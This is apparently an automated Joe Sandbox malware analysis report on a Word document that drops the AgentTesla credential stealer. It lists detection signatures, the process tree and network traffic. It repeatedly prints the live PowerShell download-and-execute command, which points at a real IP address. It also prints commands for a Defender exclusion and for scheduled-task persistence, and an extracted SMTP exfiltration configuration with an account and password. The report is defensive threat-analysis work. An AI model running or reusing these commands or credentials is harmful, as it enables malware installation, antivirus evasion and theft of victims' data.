Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Reconfirm The Details.doc

Overview

General Information

Sample Name:Reconfirm The Details.doc
Analysis ID:528737
MD5:9a7ea1172bf1250005e0fefce04f604f
SHA1:3df0782fc6ace41e15ca7c98277c79c128453d10
SHA256:80071fbb7234239c46ced3c6f0fd9aa7dbeafe79d7bfeed7993d51a69c4da006
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Tries to steal Mail credentials (via file / registry access)
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Microsoft Office creates scripting files
Installs a global keyboard hook
Office process drops PE file
Injects files into Windows application
Tries to harvest and steal ftp login credentials
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Sigma detected: Powershell Defender Exclusion
Found suspicious RTF objects
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sigma detected: Verclsid.exe Runs COM Object
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1592 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • taskmg.exe (PID: 1156 cmdline: "C:\Users\user\AppData\Roaming\taskmg.exe" MD5: 815982590DE5E574ABB8A0310826E200)
        • powershell.exe (PID: 2924 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 1176 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • taskmg.exe (PID: 2784 cmdline: C:\Users\user\AppData\Roaming\taskmg.exe MD5: 815982590DE5E574ABB8A0310826E200)
    • powershell.exe (PID: 2804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 2968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • verclsid.exe (PID: 1200 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2856 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
      • 0x326b:$sb1: -W Hidden
      • 0x325b:$sc1: -NoP
      • 0x3265:$sd1: -NonI
      • 0x3275:$se3: -ExecutionPolicy bypass
      • 0x3260:$sf1: -sta
      00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.0.taskmg.exe.400000.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            14.0.taskmg.exe.400000.13.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              14.0.taskmg.exe.400000.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                14.0.taskmg.exe.400000.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  14.0.taskmg.exe.400000.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 15 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: PowerShell DownloadFileShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: Suspicius Add Task From User AppData TempShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskmg.exe" , ParentImage: C:\Users\user\AppData\Roaming\taskmg.exe, ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp, ProcessId: 1176
                    Sigma detected: Powershell Defender ExclusionShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\taskmg.exe" , ParentImage: C:\Users\user\AppData\Roaming\taskmg.exe, ParentProcessId: 1156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 2924
                    Sigma detected: Verclsid.exe Runs COM ObjectShow sources
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1200
                    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: PowerShell Download from URLShow sources
                    Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell download and execute fileShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 236, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe', ProcessId: 1592

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 14.0.taskmg.exe.400000.13.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: Reconfirm The Details.docReversingLabs: Detection: 29%
                    Source: 14.0.taskmg.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.taskmg.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBBX? source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbV> source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

                    Software Vulnerabilities:

                    barindex
                    Document exploit detected (drops PE files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: taskmg[1].exe.0.drJump to dropped file
                    Document exploit detected (creates forbidden files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exeJump to behavior
                    Document exploit detected (process start blacklist hit)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 173.232.204.89:80
                    Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 173.232.204.89:80

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49168 -> 208.91.199.225:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 208.91.199.223:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49173 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49174 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET /taskmg.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:14:54 GMTContent-Type: application/octet-streamContent-Length: 777216Last-Modified: Thu, 25 Nov 2021 03:51:30 GMTConnection: keep-aliveETag: "619f0842-bdc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 42 08 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 0b 00 00 0a 00 00 00 00 00 00 ae ee 0b 00 00 20 00 00 00 00 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 